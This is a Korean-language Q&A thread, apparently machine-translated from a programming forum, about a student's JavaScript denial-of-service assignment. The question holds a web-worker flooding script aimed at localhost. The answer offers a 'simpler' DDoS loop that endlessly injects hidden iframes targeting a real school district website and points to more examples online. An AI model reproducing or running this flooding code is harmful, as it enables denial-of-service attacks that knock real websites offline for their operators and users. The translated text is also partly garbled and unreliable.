2017-04-01 7 views
1

을 사용하여 JavaScript DoS 공격을 실시한 결과, 서비스 거부 공격을 시도하기위한 "숙제"가있었습니다. 나는 조금 다른 방식으로 가고 싶어한다. JavaScript를 사용하여 실행하려고했습니다.대학에서 WebWorkers

질문은 다음과 같습니다 그것도 가능 이것에

  • 인가?
  • 루프백에서 HttpRequest를 수행하면 http 포트가 넘쳐서 발생하는 모든 웹 사이트의 unaccesibility 결과가 표시됩니까?
  • 광산보다 더 좋은 코드가 있습니까?

index.html을 :

<script> 
    for(var i = 0; i< 50; i++) { 
     worker = new Worker("worker.js"); 
     worker.postMessage('Hello World'); 
    } 
</script> 

worker.js :

self.addEventListener('message', function(e) { 
    while(1) { 
      var xmlHttp = new XMLHttpRequest(); 
      xmlHttp.onreadystatechange = function() { 
      if (xmlHttp.readyState == 4 && xmlHttp.status == 200) 
        callback(xmlHttp.responseText); 
      } 
      xmlHttp.open("GET", "http://127.0.0.1", true); 
      xmlHttp.send(null); 
    } 
}, false); 

는 모든 입력 주셔서 감사합니다!

+1

잘 모르겠어요하지만 원격 서버보다 자신의 컴퓨터를 충돌 할 가능성이 높습니다를 찾을 수 '(1)' – mehulmpt

+0

코드를 실행했을 때 무슨 일이 일어 났습니까? 브라우저가'while (1)'으로 멋 있었습니까? – nnnnnn

+0

@nnnnnn 웹 작업자가 장면 뒤에서 모든 작업을 수행했기 때문에 브라우저가 정상적으로 보였습니다. 개발자 도구에서 요청이 전송되고 있음을 명확하게 볼 수 있지만 원하는 웹 사이트로 이동할 수는 있습니다. – TomasB

답변

-1

우선이 코드를 개선 할 수 있으면 while (1) 대신 setInterval을 사용합니다. 둘째, 나는 여기에 훨씬 간단 버전을 발견 (있는 경우

function _DDoS(url){ 
    document.body.innerHTML+='<iframe src="'+url+'" style="display:none;"> </iframe>'; 
} 
for(;;){ 
setTimeout(_DDoS("http://www.mvcsc.k12.in.us"),10); 
} 

는 자바 스크립트 DDOS를 검색하면 많은 예